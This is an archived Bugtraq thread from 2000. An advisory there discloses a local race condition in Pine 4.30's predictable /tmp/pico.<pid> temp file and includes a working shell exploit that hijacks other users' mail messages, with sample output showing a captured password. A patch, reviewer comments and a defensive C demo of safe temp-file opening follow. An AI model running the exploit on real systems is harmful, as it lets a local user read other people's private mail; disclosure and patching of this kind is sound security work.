5845490 2000-12-11 17:43 +0900 /103 lines/ JW Oh <mat@IVNTECH.COM>
Sent by: joel@lysator.liu.se
Imported: 2000-12-11 20:41 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: mat@IVNTECH.COM
Recipient: Bugtraq (import) <14150>
Subject: [hacksware]Pine temporary file hijacking vulnerability
------------------------------------------------------------
From: JW Oh <mat@IVNTECH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0012111741270.7292-100000@ivntech.com>

Hacksware Bug Report

1. Name: Pine temporary file hijacking vulnerability
2. Release Date: 2000.12.11
3. Affected Application: Pine Version 4.30 (or maybe other versions)
4. Author: mat@hacksware.com
5. Type: Local Race Condition

6. Explanation

If the pine settings are like the following:

[x] enable-alternate-editor-cmd
[x] enable-alternate-editor-implicitly
editor = /usr/bin/vi

pine creates its temporary file in the /tmp directory with names like /tmp/pico.007292 (where 7292 is the pid of the running pine process). You can simply symlink this file (/tmp/pico.<pid>) to another file that doesn't exist. When the victim is editing a message, the victim's editor vi follows the symlink and creates another file. By removing this symlink, creating your own temporary file and making it writable to the victim, you can hijack his mail message.

7. Exploits

--------------------mon_pine.sh start--------------------------------
#!/bin/sh
# Grab local pine messages
# Usage: ./mon_pine.sh <pid of pine process>
# victim pine must use following settings
#
# mat@hacksware.com
# http://hacksware.com
#
# [x] enable-alternate-editor-cmd
# [x] enable-alternate-editor-implicitly
# editor = /usr/bin/vi
#

PID=$1
PICO_FILE=`printf "/tmp/pico.%.6d" $PID`
TRASHCAN=/tmp/.trashcan.`date|sed "s/ //g"`

echo PICO_FILE is $PICO_FILE

#if $PICO_FILE and $TRASHCAN exists, remove them
if test -f $PICO_FILE
then
    rm -f $PICO_FILE
fi
if test -f $TRASHCAN
then
    rm -f $TRASHCAN
fi

ln -s $TRASHCAN $PICO_FILE

while :
do
    if test -f $TRASHCAN
    then
        break
    fi
done

echo Victim is Editing Pine Message
rm -f $PICO_FILE
echo We replace temporary file
touch $PICO_FILE
chmod 777 $PICO_FILE
echo "Get the message from "$PICO_FILE
echo "^C to break tailer"
tail -f $PICO_FILE
--------------------mon_pine.sh end --------------------------------

8. Example

[mat@overheaven /tmp]$ ps -ax|grep pine|grep -v grep
 7292 pts/1    S      0:22 pine
[mat@overheaven /tmp]$ sh mon_pine.sh 7292
PICO_FILE is /tmp/pico.007292
... wait for victim to compose mail....
Victim is Editing Mail
We replace temporary file
Get the message from /tmp/pico.007292
^C to break tailer
Hello...
Your new password is "greenbee"
Don't let anyone know this...
Thanks..

--
=================================================
| mat@hacksware.com                             |
| http://hacksware.com                          |
=================================================
(5845490) --------------------------------(Rewrapped)

5864806 2000-12-14 17:12 +0100 /14 lines/ Andrzej Chabierski <outsider@LANGUSTA.STARNET.PL>
Sent by: joel@lysator.liu.se
Imported: 2000-12-15 22:28 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: outsider@LANGUSTA.STARNET.PL
Recipient: Bugtraq (import) <14238>
Comment on text 5856699 by Peter W <peterw@USA.NET>
Subject: Re: where user temp files should go, env var names
------------------------------------------------------------
Hello, this patch shoots off this problem of where the TMP file is, or something else...
The author of this patch is Mikolaj Rydzewski. Patch in attachment.

/----------------------------------\  /----------------------------------\
| Andrzej Chabierski               |__| ~OutSideR~ outsider@ariadna.pl   |
| Technical University of Szczecin |__| kom: 606-191-311 ICQ:26136043    |
| Network Administrator            |  | Linux Registered User #182054    |
\----------------------------------/  \----------------------------------/
(5864806) --------------------------------(Rewrapped)
Attachment (text/plain) in text 5864807

5864807 2000-12-14 17:12 +0100 /22 lines/ Andrzej Chabierski <outsider@LANGUSTA.STARNET.PL>
Attachment file name: "pine-4.30-patch"
Imported: 2000-12-15 22:28 by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: outsider@LANGUSTA.STARNET.PL
Recipient: Bugtraq (import) <14239>
Attachment (text/plain) to text 5864806
Subject: Attachment (pine-4.30-patch) to: Re: where user temp files should go, env var names
------------------------------------------------------------
diff -Nru pine4.30.orig/imap/src/osdep/unix/env_unix.c pine4.30/imap/src/osdep/unix/env_unix.c
--- pine4.30.orig/imap/src/osdep/unix/env_unix.c	Wed Oct 25 03:43:40 2000
+++ pine4.30/imap/src/osdep/unix/env_unix.c	Tue Nov  7 13:18:05 2000
@@ -55,7 +55,7 @@
 /* default directory protection */
 static long dir_protection = 0700;
 /* default lock file protection */
-static long lock_protection = 0666;
+static long lock_protection = 0600;
 /* default ftp file protection */
 static long ftp_protection = 0644;
 /* default public file protection */
@@ -1033,7 +1033,7 @@
 #ifdef CHROOT_SERVER
 "",
 #else
-"/tmp",
+(*myhomedir()) ? myhomedir() : "/tmp",
 #endif
 (unsigned long) sbuf->st_dev,(unsigned long) sbuf->st_ino);
 while (T) { /* until get a good lock */
(5864807) --------------------------------(Rewrapped)
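Review bot: in the @@ -55 hunk, dropping lock_protection from 0666 to 0600 means a process running as a different uid can no longer open the mailbox lock file, yet the lock name is built from sbuf->st_dev and sbuf->st_ino (visible in the second hunk) precisely so that every process touching the same mailbox, whoever runs it, contends on one file. The patch carries no description; it should say that cross-user locking is being given up deliberately, since 0600 is only coherent together with the move of the file under the home directory, or otherwise keep the mode and rely on the directory move alone.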
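Review bot: in the @@ -1033 hunk, myhomedir() is evaluated twice inside the argument list, and the "/tmp" fallback silently restores the original world-shared location exactly when the home directory is unknown; hoist the call into a local before the call (e.g. `char *d = myhomedir();` and then `*d ? d : "/tmp"`) and consider refusing or logging rather than falling back. Note also that this path is the c-client mailbox lock file, not the /tmp/pico.<pid> editor scratch file the original report in this thread describes, so the patch should not be read as closing that race.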
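Added example in C, not code from the advisory, the patch, or pine itself: it contrasts the opener pattern the advisory describes (a pid-predictable /tmp name opened without O_EXCL, so a planted symlink is followed) with an opener that refuses a planted name, which is the property the thread's subject line is asking for. The demo directory, the pid 7292 and the file names are constructed for the run.

```c
#define _XOPEN_SOURCE 700   /* O_NOFOLLOW, mkdtemp, symlink: POSIX.1-2008 */
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Advisory's pattern: pid-predictable name, no O_EXCL, so a planted symlink is followed. */
int open_scratch_unsafe(const char *dir, int pid, char *path, size_t len) {
    snprintf(path, len, "%s/pico.%.6d", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened opener: O_NOFOLLOW refuses to create through a symlink, O_EXCL refuses any
 * existing entry, fstat confirms a plain file of our own; returns -1 (EEXIST if planted). */
int open_scratch_safe(const char *dir, int pid, char *path, size_t len) {
    struct stat st; int fd;
    if (snprintf(path, len, "%s/pico.%.6d", dir, pid) >= (int)len) return -1;
    fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1
        || st.st_uid != getuid()) { close(fd); unlink(path); return -1; }
    return fd;
}

/* Demo in a private mkdtemp() dir with a constructed pid: plant a dangling symlink at
 * the predictable name (the advisory's precondition). Returns 2*unsafe_fooled+safe_fooled. */
int run_demo(void) {
    char dir[] = "/tmp/pinedemo.XXXXXX", lnk[PATH_MAX], target[PATH_MAX], p[PATH_MAX];
    struct stat st; int fd, unsafe_fooled, safe_fooled;
    if (!mkdtemp(dir)) return -1;
    snprintf(lnk, sizeof lnk, "%s/pico.%.6d", dir, 7292);
    snprintf(target, sizeof target, "%s/elsewhere", dir);
    if (symlink(target, lnk) != 0) return -1;
    fd = open_scratch_unsafe(dir, 7292, p, sizeof p);
    unsafe_fooled = fd >= 0 && lstat(target, &st) == 0 && S_ISREG(st.st_mode);
    if (fd >= 0) close(fd);
    fd = open_scratch_safe(dir, 7292, p, sizeof p);
    safe_fooled = fd >= 0;                /* must stay 0: EEXIST on the symlink */
    if (fd >= 0) close(fd);
    unlink(target); unlink(lnk); rmdir(dir);   /* remove the throwaway dir */
    return 2 * unsafe_fooled + safe_fooled;
}

int main(void) {
    int r = run_demo();   /* expect 2: the unsafe opener is fooled, the hardened one is not */
    printf("unsafe fooled=%d hardened fooled=%d\n", r >> 1, r & 1);
    return r == 2 ? 0 : 1;
}
```

The hardened opener still uses a predictable name only to make the refusal visible; in real code the per-user 0700 directory plus mkstemp() is the simpler choice, and the fstat check is what catches a file swapped in between creation and use.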